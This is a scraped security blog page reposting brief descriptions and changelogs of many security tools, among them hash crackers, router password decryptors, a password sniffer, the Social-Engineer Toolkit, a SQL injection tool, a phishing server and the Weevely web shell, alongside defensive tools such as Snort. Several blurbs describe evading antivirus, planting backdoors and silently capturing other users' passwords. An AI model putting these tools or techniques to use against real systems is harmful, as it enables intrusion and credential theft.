Thủ Phủ Hacker Mũ Trắng Buôn Ma Thuột

Chương trình Đào tạo Hacker Mũ Trắng Việt Nam tại Thành phố Buôn Ma Thuột kết hợp du lịch. Khi đi là newbie - Khi về là HACKER MŨ TRẮNG !

Hacking Và Penetration Test Với Metasploit

Chương trình huấn luyện sử dụng Metasploit Framework để Tấn Công Thử Nghiệm hay Hacking của Security365.

Tài Liệu Computer Forensic Của C50

Tài liệu học tập về Truy Tìm Chứng Cứ Số (CHFI) do Security365 biên soạn phục vụ cho công tác đào tạo tại C50.

Sinh Viên Với Hacking Và Bảo Mật Thông Tin

Cuộc thi sinh viên cới Hacking. Với các thử thách tấn công trang web dành cho sinh viên trên nền Hackademic Challenge.

Tấn Công Và Phòng Thủ Với BackTrack / Kali Linux

Khóa học tấn công và phòng thủ với bộ công cụ chuyên nghiệp của các Hacker là BackTrack và Kali LINUX dựa trên nội dung Offensive Security

Sayfalar

[DLink Password Decryptor] Tool to recover the Login Password of D-Link modem/router


DLink Password Decryptor is a free desktop tool to instantly recover the Login Password of D-Link modem/router.

If you have lost login authentication password of your D-link modem and you have backup configuration file then you can use this tool to quickly get back your password.

It supports dual mode of password recovery. You can either enter the encrypted D-link password directly or specify the D-Link Modem's backup configuration file. In second case, it will automatically detect the login password from config file and decrypt it instantly.

Note that it is tested with limited number of D-link modems including latest model DSL-2750U. Hence it may or may not work with other models.

This is very handy tool for all Network Administrators as well as penetration testers.
It is successfully tested on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8

Screenshots

Screenshot 1: DLink Password Decryptor is showing the recovered Password from the encrypted D-Link Login Password


Screenshot 2: Showing Password recovered from the D-Link backup configuration file.

Download DLink Password Decryptor v1.0 
License  : Freeware
Platform : Windows XP, 2003, Vista, Windows 7, Windows 8

[Capsa packet Sniffer] Herramienta Portable para Análisis de Red



Capsa es una Herramienta Portable para Análisis de Red gratuito para que los administradores de red puedan supervisar, diagnosticar y solucionar sus problemas en network. La versión gratuita del analizador viene con toneladas de características, y es lo suficientemente buena para se uso doméstico, así como su uso en la pequeña empresa.
Con Capsa Sniffer puedes monitorear y capturar los datos de red de 50 direcciones IP.

Características de Capsa :
  • Detalle de tráfico de todos los equipos.
  • Control de ancho de banda (para encontrar los equipos que están viendo vídeos en línea).
  • Diagnóstico de Red para identificar problemas en la red.
  • La registro de actividad del Netwok (para la grabación de mensajería instantánea y correo web).
  • Red de monitoreo del comportamiento.

Download Capsa packet Sniffer

[HoneyProxy] A man-in-the-middle SSL Proxy & Traffic Analyzer



HoneyProxy is a lightweight tool that allows live HTTP(S) traffic inspection and analysis.
It focuses on features that are useful for malware analysis and network forensics.

Features

  • Analyze HTTP(S) traffic on the fly
  • Filter and highlight traffic, regex support included.
  • Report Generation for saved flows, including a live JS editor.
  • Save HTTP conversations for later analysis
  • Make scripted changes with Python, e.g. remove Cache Header.
  • based on and compatible to mitmproxy.
  • cross-platform (Windows, OSX and Linux)
  • SSL interception certs generated on the fly
Looking for more? Check out our GitHub wiki!

 

Quick Start

Download the latest release or pick a development snapshot.

Install all dependencies: pip install pyOpenSSL pyasn1 Twisted Autobahn
Windows users: Install the binaries for pyOpenSSL and Twisted manually (or compile yourself).
Ubuntu / Debian users: Install twisted as a package (sudo apt-get install python-twisted). If you get errors, check this page.

Start HoneyProxy with python honeyproxy.py or python honeyproxy.py --help.
If you don't use a modern browser, a kitten will die. We support both Firefox and Chrome!
Most command line parameters are documented in the mitmproxy docs.

[PunkSPIDER] Búsqueda Masiva de Vulnerabilidades en Aplicaciones Web

Alejandro Caceres, CTO de Hyperion Gray, presentó en la conferencia ShmooCon 2013 un interesante proyecto llamado PunkSPIDER. Se trata de una arquitectura basada en clusters Apache Hadoop para un escaner distribuido capaz de realizar miles de escaneos de vulnerabilidades web al día y poner a disposición de cualquiera sus resultados. Es decir, PunkSPIDER es un gran motor global de búsqueda de vulnerabilidades en aplicaciones web.

El objetivo de este proyecto es llamar la atención acerca de la pobre seguridad de las aplicaciones web en general. Con sólo escribir la URL puede ayudar a cualquier organización a conocer si su portal público tiene vulnerabilidades críticas que necesitan ser corregidas de inmediato.

Por supuesto, PunkSPIDER puede generar también cierta controversia porque, como muchas herramientas, puede ser utilizada para fines maliciosos, es decir, para conocer y explotar vulnerabilidades de aplicaciones web ajenas. Si bien recordemos que los escaneos son bastante automatizados y generalistas y cualquier atacante podría hacerlos previamente de forma similar en las fases previas a la intrusión...

Puedes descargar el código fuente, donar en Kickstarter y/o contactar con punkspider@hyperiongray.com si deseas colaborar con el proyecto.


Fuente: http://www.hackplayers.com/

[Hash Kracker Console] Tool to find out the password from the Hash


Hash Kracker Console is the all-in-one command-line tool to find out the password from the Hash.


Currently it supports password recovery from following popular Hash types
  • MD5
  • SHA1
  • SHA256
  • SHA384
  • SHA512

Also it offers 4 types of Password Recovery methods based on the complexity of password
  • Dictionary Crack
  • Hybrid Crack
  • Brute-force Crack
  • Pattern based Brute-force Crack

Being a command-line makes it faster and easy for automation. It is fully portable tool and includes installer also.

It works on wide range of platforms starting from Windows XP to Windows 8.

Download Hash Kracker Console v1.0
More

[oclHashcat-lite v0.15] Worlds fastest NTLM, MD5, SHA1, SHA256 and Descrypt Cracker



Features

  • Worlds fastest NTLM, MD5, SHA1, SHA256 and descrypt cracker
  • Free
  • Multi-GPU (up to 128 gpus)
  • Multi-OS (Linux & Windows native binaries)
  • Multi-Platform (OpenCL & CUDA support)
  • Multi-Algo (see below)
  • Low resource utilization, you can still watch movies or play games while cracking
  • Focuses one-shot, lightweight hashes
  • Supports mixed GPU types
  • Supports markov attack
  • Supports mask attack
  • Supports distributed cracking
  • Supports pause / resume while cracking
  • Supports sessions
  • Supports restore
  • Supports hex-salt
  • Supports hex-charset
  • Integrated thermal watchdog
  • ... and much more

Algorithms

  • MD5
  • md5($pass.$salt)
  • Joomla
  • SHA1
  • nsldap, SHA-1(Base64), Netscape LDAP SHA
  • sha1($pass.$salt)
  • nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
  • Oracle 11g
  • MSSQL(2000)
  • MSSQL(2005)
  • MySQL
  • MD4
  • md4($pass.$salt)
  • NTLM
  • Domain Cached Credentials, mscash
  • SHA256
  • sha256($pass.$salt)
  • descrypt, DES(Unix), Traditional DES
  • SHA512
  • sha512($pass.$salt)
  • Cisco-PIX MD5
  • Double MD5
  • vBulletin < v3.8.5
  • vBulletin > v3.8.5
  • IPB2+, MyBB1.2+
  • LM
  • Oracle 7-10g, DES(Oracle)
  • SHA-3(Keccak)
  • Half MD5
  • NetNTLMv1-VANILLA / NetNTLMv1+ESS
  • NetNTLMv2
  • Cisco-IOS SHA256

Download here: http://adf.ly/145xZ2


type: driver
file: host programs
desc: added support for AMD ADL v5.0 library

type: feature
file: hashcat-cli
desc: added mode -m 5500 = NetNTLMv1-VANILLA / NetNTLMv1+ESS
trac: #51
trac: #96

type: feature
file: hashcat-cli
desc: added mode -m 5600 = NetNTLMv2
trac: #56

type: feature
file: kernels
desc: added -m 5700 = Cisco-IOS SHA256
cred: philsmd

type: feature
file: kernels
desc: modified -m 5100 = Half MD5 so that it accepts only 16 byte input, see next change why
trac: #89

type: feature
file: kernels
desc: modified -m 5100 = Half MD5 so it can crack middle and right portions, too (not just left)
trac: #89

type: bug
file: kernels
desc: fixed bug in NVidia version had to switch back to bitness-depending kernels

type: bug
file: kernels
desc: fixed bug in NVidia version writing to constant memory from kernel isnt allowed

type: bug
file: hashcat-cli
desc: fixed bug in benchmark-mode, do not run MD5 again at end

type: bug
file: hashcat-cli
desc: fixed bug in benchmark-mode, Memory stepping when doing a benchmark
trac: #57

[oclHashcat-plus v0.14] Worlds fastest md5crypt, phpass, mscash2 and WPA/WPA2 cracker




Features

  • Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker
  • Worlds first and only GPGPU based rule engine
  • Free
  • Multi-GPU (up to 128 gpus)
  • Multi-Hash (up to 15 million hashes)
  • Multi-OS (Linux & Windows native binaries)
  • Multi-Platform (OpenCL & CUDA support)
  • Multi-Algo (see below)
  • Low resource utilization, you can still watch movies or play games while cracking
  • Focuses highly iterated modern hashes
  • Focuses single dictionary based attacks
  • Supports mask attack
  • Supports distributed cracking
  • Supports pause / resume while cracking
  • Supports sessions
  • Supports restore
  • Supports reading words from file
  • Supports reading words from stdin
  • Supports hex-salt
  • Supports hex-charset
  • Integrated thermal watchdog
  • 30+ Algorithms implemented with performance in mind
  • ... and much more

Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Hybrid dict + mask
  • Hybrid mask + dict

Download here: http://adf.ly/145xV8

type: driver
file: host programs
desc: added support for AMD ADL v5.0 library

type: feature
file: hashcat-cli
desc: added mode -m 5500 = NetNTLMv1-VANILLA / NetNTLMv1+ESS
trac: #51
trac: #96

type: feature
file: hashcat-cli
desc: added mode -m 5600 = NetNTLMv2
trac: #56

type: feature
file: kernels
desc: added -m 5700 = Cisco-IOS SHA256
cred: philsmd

type: feature
file: kernels
desc: modified -m 5100 = Half MD5 so that it accepts only 16 byte input, see next change why
trac: #89

type: feature
file: kernels
desc: modified -m 5100 = Half MD5 so it can crack middle and right portions, too (not just left)
trac: #89

type: bug
file: kernels
desc: fixed bug in NVidia version had to switch back to bitness-depending kernels

type: bug
file: kernels
desc: fixed bug in NVidia version writing to constant memory from kernel isnt allowed

[Hashcat v0.44] Advanced Password Recovery


Features

  • Multi-Threaded
  • Free
  • Multi-Hash (up to 24 million hashes)
  • Multi-OS (Linux, Windows and OSX native binaries)
  • Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)
  • SSE2 accelerated
  • All Attack-Modes except Brute-Force and Permutation can be extended by rules
  • Very fast Rule-engine
  • Rules compatible with JTR and PasswordsPro
  • Possible to resume or limit session
  • Automatically recognizes recovered hashes from outfile at startup
  • Can automatically generate random rules
  • Load saltlist from external file and then use them in a Brute-Force Attack variant
  • Able to work in an distributed environment
  • Specify multiple wordlists or multiple directories of wordlists
  • Number of threads can be configured
  • Threads run on lowest priority
  • Supports hex-charset
  • Supports hex-salt
  • 30+ Algorithms implemented with performance in mind
  • ... and much more


Attack-Modes

  • Straight *
  • Combination *
  • Toggle-Case
  • Brute-Force
  • Permutation
  • Table-Lookup

Download here: http://adf.ly/143xLq

type: feature
file: hashcat-cli
desc: added mode -m 9999 = Plaintext
trac: #45

type: feature
file: hashcat-cli
desc: added mode -m 5500 = NetNTLMv1 + ESS
trac: #96

type: feature
file: kernels
desc: added -m 5700 = Cisco-IOS SHA256
cred: philsmd

type: change
file: hashcat-cli
desc: changed the hash-format for NetNTLMv1 and NetNTLMv2 to .lc format
cred: #98

type: bug
file: hashcat-cli
desc: fixed bug in 32 bit version, did not crack -m 1800 sha512crypt
trac: #92

type: bug
file: hashcat-cli
desc: fixed bug in NetNTLMv2 parser
trac: #95

[Juniper Password Decryptor] Tool to Decode and Recover Juniper $9$ Passwords


Juniper Password Decryptor is a free desktop tool to instantly decode and recover Juniper $9$ Passwords.

Juniper Router allows you to configure 2 types of passwords,
  • Juniper $1$ Password: Here MD5 hash of the password is stored. It starts with $1$ and requires brute-force technique to recover the password
  • Juniper $9$ Password: These passwords are encoded using Juniper's private encryption algorithm. Password hash starts with $9$ text & can be decrypted instantly.

You can use Juniper Password Decryptor tool to quickly decrypt these Juniper $9$ passwords.

It supports dual mode of password recovery. You can either enter the encrypted Juniper $9$ password directly or specify the Juniper router configuration file. In second case, it will automatically detect the $9$ password from config file and decrypt it instantly.


This is very handy tool for all Administrators as well as penetration testers.
It is successfully tested on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.

Screenshots

Screenshot 1: Juniper Password Decryptor is showing the recovered Password from the encrypted Juniper $9$ Password

Screenshot 2: Showing Password recovered from the Juniper configuration file.

Download Juniper Password Decryptor v1.0
License  : Freeware
Platform : Windows XP, 2003, Vista, Windows 7, Windows 8

[Dexter] A Free Tool for Mobile (Android) Malware Analysis


Bluebox Labs just released Dexter, a free tool which wants to help information security professionals and malware analysts to analyze Android mobile applications in order to find malware and vulnerabilities.


Dexter combines manual and automatic static program analysis to provide a better understanding of an Android application. Since the original application source code is not required, Dexter is useful during third party binary application analyses and malware reverse engineering.


The following core features are provided to the analyst:
  • App statistics and direct access to all program entry points
  • Package graph visualization
  • Class and inheritance diagrams
  • Class decompilation
  • Method bytecode graph visualization
  • A relational query language and text search feature
  • APK file browser
  • Coloring, tagging and commenting on package, class, method and even basic block layer
  • String listing including code cross reference resolution
  • Automated semantic annotation of program elements
  • Integrated multi-user support for collaboration

More info Here.

[WhatWeb] Scanner para Fingerprinting de una Web


WhatWeb es una herramienta que nos permite realizar Fingerprinting de una web.


WhatWeb tiene la particularidad de identificar webs que están realizadas con alguno de los CMS más populares como WordPress, Joomla!, phpBB o Drupal, además permite identificar versiones de librerías JavaScript, Geolocalización de dominios, identificación de etiquetas HTML, Servidores Web y más de 900 plugins para extender su funcionalidad.


A los que nunca utilizaron esta herramienta y quieren comenzar a entrar en las etapas de reconocimiento y fingerprinting, sus primeros pasos sin es utilizar WhatWeb.

Descarga WhatWeb
Repositorio  en GitHub
Web del Autor
The WhatWeb Wiki

[Converter v0.7] Analyzing and Deobfuscating Malicious Scripts



Malicious Java applets have been making news for awhile so I thought I would update Converter to include some new features to help with deobfuscating them.


This is a list of changes made to this version:
+ Replaced Binary-to/from-Text with Binary-to/from-Hex to make it more useful
+ Added Filter > “Keep Hex” to only keep hex characters
+ Added Format > “Mixed Octal to Hex” to convert a mixture of text and octal to hex
+ Added Format > “Sort Text” to sort a string
+ Added Format > “Hex Format – CSV” separates hex values with a comma
+ Added Tools > “String Builder” to keep values between quotes
+ Modified “Dec-to-Hex” and “Dec-to-Octal” to handle negative integers
+ Added “copy output to input” option to Secret Decoder Ring
+ Added ability to import first KB (or all) of data to Key Search/Convert
+ Eliminated extra fields in Key Search/Convert screen
+ Made expression capability in Key Search/Convert and Convert Binary File a little more robust (added Extra > “Expressions Help”)


Here’s a look at some of the features in action…
This applet used binary strings to hide its actions:
2013-03-16_01
Just paste it in and the Binary-to-Hex feature will split on every eight characters and convert them to hex. You can choose the Output Format using the dropdown at the bottom.
2013-03-16_02
Here we see an applet concatenating several variables together before it deobfuscates it:
2013-03-16_03
Using the “String Builder” feature…
2013-03-16_04
Just paste the section in and Converter will concatenate everything between the quotes together. Make sure the beginning and ending quotes are present.
2013-03-16_05
This applet is using a mix of text and octal characters:
2013-03-16_06
The “Mixed Octal to Hex” feature…
2013-03-16_07
Will convert the string (including escaped characters) to hex.
2013-03-16_08
This applet is using an array of positive and negative integers:
2013-03-16_09
Converter now converts decimal to hex properly.
2013-03-16_10
This particular applet takes this concatenated string and deobfuscates it by running through a decoder routine three times:
2013-03-16_11
The Secret Decoder Ring now allows you to copy the output to the input field so you can decode it any number of times without having to manually copy/paste each time.
2013-03-16_12
Finally, you can see the changes made to the Key Search/Convert screen. I tried to make the expressions as flexible as possible.
2013-03-16_13

Download Converter v0.7
Official website: http://www.kahusecurity.com/

[JoomlaScan v1.5] Scanner para encontrar vulnerabilidades en Joomla

En esta nueva actualización de JoomlaScan se reconoce la versión 3.1.0-beta1 de Joomla! pasando por las últimas de 2.5.x y las primeras de 3.0.x


Desde que apareció la versión 2.5 la identificación de la versión de Joomla! se reduce a consultar un archivo, concretamente http://tu.joomla.com/administrator/manifest/files/joomla.xml donde podemos localizar la versión exacta:
<version>3.0.3</version>

Aunque bien es cierto que en versiones anteriores ha podido ser un quebradero de cabeza, teniendo que analizar la existencia y/o contenido de diferentes ficheros, que aparecen y desaparecen en nuevas revisiones, todo ello previo estudio de los repositorios de Joomla!.

Aprovechando los retoques, he actualizado también algunos exploits nuevos, obteniendo los enlaces de http://www.exploit-db.com y http://www.securityfocus.com

Para descargarlo: http://adf.ly/1461Oy

O si ya lo tienes instalado:
$ perl joomlascan.pl -update

Web del Autor: http://blog.pepelux.org/

[L517] Simple WordList Generator for Windows

L517 is a word-list generator for the Windows Operating System.

I wrote L517 to be the only word-list generator and editor I would ever need. L517 is small (considering what it does), it is fast (considering it's a Windows app), and it is lightweight (when not loading astronomically large lists). A user-friendly GUI requires no memorization of command-line arguments!

L517 contains hundreds of options for generating a large, personalized, and/or generic wordlist. With L517, you can generate phone numbers, dates, or every possible password with only a few clicks of the keyboard; all the while, filtering unwanted passwords. 

Changes

  • v0.8 : Language support for French, German, and Spanish; available in HELP menu.
  • v0.7 : Customizable 'leetspeak' case mutations.
  • v0.6 : Paste (Ctrl+V) in the EDIT menu; various bug fixes.
  • v0.5 : Corrected case bugs.
  • v0.4 : Fixed RICHTX32.OCX error; Removed RichTextControl from project -- replaced with built-in Microsoft Word API's for .doc files.
  • v0.3 : New 'phone number' generation option; Generate based on charset; Two new cases; Split files every # of items.
  • v0.2 : 'Analyzer' option; Fixed bugs; More help documentation.
  • v0.1 : First public release




[SET v4.7] The Social-Engineer Toolkit

SET update
The Social-Engineer Toolkit (SET) version 4.7 codename “Headshot” has been released. This version of SET introduces the ability to specify multi-powershell injection which allows you to specify as many ports as you want and SET will automatically inject PowerShell onto the system on all of the reverse ports outbound. What’s nice with this technique is it never touches disk and also uses already white listed processes. So it should never trigger anything like anti-virus or whitelisting/blacklisting tools. In addition to multi-powershell injector, there are a total of 30 new features and a large rewrite of how SET handles passing information within different modules.

Change log for version 4.7
  • removed a prompt that would come up when using the powershell injection technique, port.options is now written in prep.py versus a second prompt with information that was already provided
  • began an extremely large project of centralizing the SET config file by moving all of the options to the set.options file under src/program_junk
  • moved all port.options to the central routine file set.options
  • moved all ipaddr.file to the central routine file set.options
  • changed spacing on when launching the SET web server
  • changed the wording to reflect what operating systems this was tested on versus browsers
  • removed an un-needed print option1 within smtp_web that was reflecting a message back to user
  • added the updated java bean jmx exploit that was updated in Metasploit
  • added ability to specify a username list for the SQL brute forcing, can either specify sa, other usernames, or a filename with usernames in it
  • added new feature called multi-powershell-injection – configurable in the set config options, allows you to use powershell to do multiple injection points and ports. Useful in egress situations where you don’t know which port will be allowed outbound.
  • enabled multi-pyinjection through java applet attack vector, it is configured through set config
  • removed check for static powershell commands, will load regardless – if not installed user will not know regardless – better if path variables aren’t the same
  • fixed a bug that would cause linux and osx payloads to be selected even when disabled
  • fixed a bug that would cause the meta_config file to be empty if selecting powershell injection
  • added automatic check for Kali Linux to detect the default moved Metasploit path
  • removed a tail comma from the new multi injector which was causing it to error out
  • added new core routine check_ports(filename, ports) which will do a compare to see if a file already contains a metasploit LPORT (removes duplicates)
  • added new check to remove duplicates into multi powershell injection
  • made the new powershell injection technique compliant with the multi pyinjector – both payloads work together now
  • added encrypted and obfsucated jar files to SET, will automatically push new repos to git everyday.
  • rewrote the java jar file to handle multiple powershell alphanumeric shellcode points injected into applet.
  • added signed and unsigned jar files to the java applet attack vector
  • removed create_payload.py from saving files in src/html and instead in the proper folders src/program_junk
  • fixed a payload duplication issue in create_payload.py, will now check to see if port is there
  • removed a pefile check unless backdoored executable is in use
  • turned digital signature stealing from a pefile to off in the set_config file
  • converted all src/html/msf.exe to src/program_junk/ and fixed an issue where the applet would not load properly
It can also be downloaded through github using the following command: 
git clone http://adf.ly/1461HR

[Password Sniffer Console] Password Sniffing Tool to capture Email, Web and FTP login passwords


Password Sniffer Console is the all-in-one command-line based Password Sniffing Tool to capture Email, Web and FTP login passwords passing through the network.

It automatically detects the login packets on network for various protocols and instantly decodes the passwords.

Here is the list of supported protocols,
  • HTTP (BASIC authentication)
  • FTP
  • POP3
  • IMAP
  • SMTP

In addition to recovering your own lost passwords, you can use this tool in following scenarios,
  • Run it on Gateway System where all of your network's traffic pass through.
  • In MITM Attack, run it on middle system to capture the Passwords from target system.
  • On Multi-user System, run it under Administrator account to silently capture passwords for all the users.
It includes Installer which installs the Winpcap, network capture driver required for sniffing. ForWindows 8, first you have to manually install Winpcap driver (in Windows 7 Compatibility mode) and then run our installer to install only Password Sniffer Console.

It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Download  Password Sniffer Console

[SCIP] Indentify, Enumerate & Execute Invisible ASP.net Controls


SCIP is an OWASP ZAP extension designed to assess the security of ASP.net and Mono applications, while abusing platform specific behaviors and misconfigurations. 

The extension currently supports the following features: 

Identify the existence of invisible, commented and disabled server side web controls in ASP.net – passively (!). Identify which ASP.net security configuration is active in each page (EventValidation, MAC), and in which cases the invisible controls are exploitable – passively (!) 

Enumerate the names of invisible controls using built-in customizable dictionaries with ASP.net naming conventions.  Rebuild the event validation whenever possible (MAC=off)

Execute invisible controls when either one of the security features is turned OFF, or when there is a server-side callback implementation flaw.  Execute disabled controls and commented out controls regardless of security Support additional manual techniques for executing controls despite the security features.

The extension can be obtained from the project's website or from ZAP's built-in marketplace feature: 

[SSLyze v0.6] SSL Server Configuration Scanning Tool


SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify misconfigurations affecting their SSL servers.

Features
  • SSL 2.0/3.0 and TLS 1.0/1.1/1.2 compatibility
  • Performance testing: session resumption and TLS tickets support
  • Security testing: weak cipher suites, insecure renegation, CRIME and THC-SSL DOS attacks
  • Server certificate validation
  • Support for StartTLS with SMTP and XMPP, and traffic tunneling through an HTTPS proxy
  • Client certificate support for servers performing mutual authentication
  • Scan results can be written to an XML file for further processing
New in v0.6:
  • Added support for Server Name Indication; see –sni
  • Partial results are returned when the server requires client authentication but no client certificate was provided
  • Preliminary IPv6 support
  • Various bug fixes and better support of client authentication and HTTPS tunneling

You can download SSLyze v0.6 here:

Linux/OSXsslyze-0.6_src.zip
Windows 7/Python 32-bitsslyze-0.6_Windows7_Python32.zip
Windows 7/Python 64-bitsslyze-0.6_Windows7_Python64.zip

Or read more here.

[Evasi0n] Quitar el jailbreak en el iPhone/iPod touch/iPad


El jailbreak no es necesariamente ilegal (al menos no en Estados Unidos), pero sin lugar a dudas es una práctica mal vista por Apple. Si quieres llevar tu dispositivo móvil a un taller de reparación, entonces deberás quitar primero el jailbreak.



Los evad3rs (autores de la herramienta de jailbreak untethered evasi0n) han dicho que el jailbreak no afecta de ningún modo a los iPhones – por ejemplo, no provoca un mayor consumo de batería ni otras cosas parecidas.

Sin embargo, el jailbreak habilita algunas funciones que finalmente podrían llevar a ciertos comportamientos no deseados por parte del terminal. Y si algún día tienes que llevar el iPhone, iPod touch o iPad a un taller de reparaciones, lo más probable es que Apple te niegue la garantía si descubre que tienes jailbreak.

En este caso, deberás quitar el jailbreak. Para hacerlo, sigue el consejo de los evad3rs:

“Si algún día decides que quieres deshacer el jailbreak, puedes conectar tu dispositivo al ordenador, hacer una copia de seguridad completa con iTunes, pinchar sobre 'restaurar' en iTunes para borrar el dispositivo y cargar la copia de seguridad cuando lo pida. Todas tus aplicaciones de App Store y otros datos se conservarán, como de costumbre”.

Evasi0n

 

[SHA256 Salted Hash Kracker]Tool to Crack your Salted SHA256 Hash


SHA256 Salted Hash Kracker is the free tool to crack and recover your lost password from the salted SHA256 hash.


These days most websites and applications use salt based SHA256 hash generation to prevent it from being cracked easily using precomputed hash tables such as Rainbow Crack. In such cases, 'SHA256 Salted Hash Kracker' will help you to recover your lost password from salted SHA256 hash.
It uses dictionary based cracking method which makes the cracking operation simple and easier. By default small dictionary file is included but you can find good collection of password dictionaries (also called wordlist) here & here.

Though it supports only Dictinary Crack method, you can easily use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'SHA256 Salted Hash Kracker'.

It also allow you to specify the salt position either in the beginning of password [ sha256(salt+password)] or at the end of the password [sha256(password+salt)]. In case you want to perform normal SHA256 hash cracking without the salt then just leave the Salt field blank.

It works on both 32-bit & 64-bit Windows platforms starting from Windows XP to Windows 8.



[JSQL v0.3] Java Tool for Automatic Database Injection

jSQL Injection is a lightweight application used to find database information from a distant server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).




Version 0.2 features:
  • GET, POST, header, cookie methods
  • normal, error based, blind, time based algorithms
  • automatic best algorithm selection
  • thread control (start/pause/resume/stop)
  • expose URL calls
  • simple evasion
  • data retrieving progression bar
  • proxy setting
  • supports MySQL

Next release v0.3 will include:
+ distant file reading [sqli]
+ webshell deposit [sqli]
+ terminal to run webshell commands [gui]
+ configuration backup [gui]
+ Updates checking [gui]
+ user interface tweaks [gui]
Next work:
+ distant table writing [sqli]
+ distant file writing [sqli]
+ reverse tcp shell deposit [sqli]
+ right elevation [sqli]
+ speed increase (non encoding pass): 50% faster [sqli]
+ control all running tasks in a tab [gui]
# speed test comparison with other injection tools [dev]
# automatic code testing (JUnit) [dev]
# wiki pages [site]


[Pentoo 2013.0 RC1.1] Security-Focused live CD based on Gentoo

Pentoo is a security-focused live CD based on Gentoo It's basically a Gentoo install with lots of customized tools, customized kernel, and much more.

Pentoo LiveCD 1
Pentoo 2013.0 RC1.1 features :
  • Changes saving
  • CUDA/OpenCL Enhanced cracking software
    • John the ripper
    • Hashcat Suite of tools
  • Kernel 3.7.5 and all needed patches for injection
  • XFCE 4.10
  • All the latest tools and a responsive development team!
Here is a non-exhaustive list of the features currently included :
  • Hardened Kernel with aufs patches
  • Backported Wifi stack from latest stable kernel release
  • Module loading support ala slax
  • Changes saving on usb stick
  • XFCE4 wm
  • Cuda/OPENCL cracking support with development tools
  • System updates if you got it finally installed

[Snort 2.9.4.1] Network Intrusion Detection System


Snort is a free and open source network intrusion prevention system (NIPS) and network intrusion detection system (NIDS) . Snort having the ability to perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks. Snort performs protocol analysis, content searching, and content matching.

Snort 2.9.4.1   Network intrusion detection system
The program can also be used to detect probes or attacks, including, but not limited to, operating system fingerprinting attempts, common gateway interface, buffer overflows, server message block probes, and stealth port scans. Snort can be configured in three main modes: sniffer, packet logger, and network intrusion detection.

Improvements in Snort 2.9.4.1
  • Updated File processing for partial HTTP content and MIME attachments.
  • Addition of new config option max_attribute_services_per_host and improve memory usage within attribute table.
  • Handle excessive overlaps in frag3.
  • Stream API updates to return session key for a session.
  • Reduce false positives for TCP window slam events.
  • Updates to provide better encoding for TCP packets generated for respond and react.
  • Disable non-Ethernet decoders by default for performance reasons. If needed, use --enable-non-ether-decoders with configure.

[SSL Certificate Downloader] Command-line Tool to grab SSL Certificate from Server Remotely




SSL Cert Downloader is a free command-line tool to grab SSL certificate from server remotely.

It can be used to download certificate from any of the SSL enabled services including

  • HTTPS (443)
  • LDAPS (636)
  • SMTPS (465)
  • POPS (995)
  • IMAPS (993)

You can either specify IP address or host name of the server. Also you can enter any custom port which makes it useful when SSL service is running on non-standard port.


Once the certificate is downloaded from the server it will be saved to the specified file. Later you can just double click on the saved file to view the SSL certificate.

It is very easy to use and being a command-line tool makes it easy for automation through scripting.
It is fully portable and works on all platforms starting from Windows XP to Windows 8.





[Ghost Phisher Tool] Fake DNS Server, Fake DHCP Server and Fake HTTP server


Ghost Phisher is a computer security application that comes inbuilt with a Fake DNS Server, Fake DHCP Server, Fake HTTP server and also has an integrated area for automatic capture and logging of HTTP form method credentials to a database. The program could be used as an honeypot, could be used to service DHCP request , DNS requests or phishing attacks

Requirements:
  • python,
  • python-qt4,
  • dhcp3-server,
  • ettercap-gtk


http://adf.ly/145t5I

[Hook Analyser v2.4] Application (and Malware) Analysis tool


Application (and Malware) Analysis tool. Hook Analyser is a hook tool which could be potentially helpful in reversing application and analysing malwares.


Changelog v2.4
  • Hook Analyser can now analyse DLLs. (Part of the Static Malware Analysis Module)
  • The deep trace functionality has been improved significantly, and now it supports searching (and logging) for traces such as Shellcodes, Filenames, WinSockets, Compiler Traces etc.(Part of the Static Malware Analysis Module)
  • Exe extractor – This is one of the feature which is useful for incident handlers, essentially allows dumping of executables from process/s, which could then be analysed using Hook Analyser, Malware Analyser or other tools for anomalies check. (New module added)
  • The static malware analysis has been further improved, and new features have been added. I will let you explore this.(Part of the Static Malware Analysis Module)
  • Minor bug fixes.

More Information:

[Weevely] PHP Stealth Tiny Web Shell


Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

Weevely is currently included in Backtrack and Backbox and all the major Linux distributions oriented for penetration testing.

  • More than 30 modules to automatize administration and post exploitation tasks:
    • Execute commands and browse remote filesystem, even with PHP security restriction
    • Audit common server misconfigurations
    • Run SQL console pivoting on target machine
    • Proxy your HTTP traffic through target
    • Mount target filesystem to local mount point
    • Simple file transfer from and to target
    • Spawn reverse and direct TCP shells
    • Bruteforce SQL accounts through target system
    • Run port scans from target machine
    • And so on..
  • Backdoor communications are hidden in HTTP Cookies
  • Communications are obfuscated to bypass NIDS signature detection
  • Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection
You can download Weevely v1.0 here:


Or read more here.